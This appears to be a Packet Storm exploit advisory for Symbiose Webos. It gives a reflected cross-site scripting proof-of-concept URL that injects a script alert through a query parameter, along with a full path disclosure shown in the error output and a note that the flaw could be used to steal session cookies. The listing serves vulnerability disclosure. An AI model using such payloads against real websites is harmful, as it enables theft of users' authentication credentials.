Symbiose Webos suffers from cross site scripting and path disclosure vulnerabilities.
96e708da4a198281025a3ca9681bab92486c5ac9e9232361325b1a48a0a5a90d# Exploit Title: Symbiose Webos - XSS / FPD
# Date: 04 July 2014
# Exploit Author: G4eL
# Download: http://symbiose.fr.cr/
# Demo: http://webos.symbiose.fr.cr/
# Tested on: Ubuntu
http://[domain]/usr/?path=/usr/&type=1<script>alert(123)</script>
# Results :
Fatal error: Class 'lib\ctrl\rawDataCall\1<script>alert(123)</script>Controller' not found in /home/user/public_html/lib/Application.class.php on line 56
1- Cross Site Scripting (alert 123)
2- Full Path Disclosure (/home/user/public_html/)
# Issue Details :
A remote attacker could exploit this vulnerability using the host
parameter in a specially-crafted URL to execute script in a victim's Web
browser within the security context of the hosting Web site, once the
URL is clicked. An attacker could use this vulnerability to steal the
victim's cookie-based authentication credentials.
# by G4eL
# Skype : live:s3cur3
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed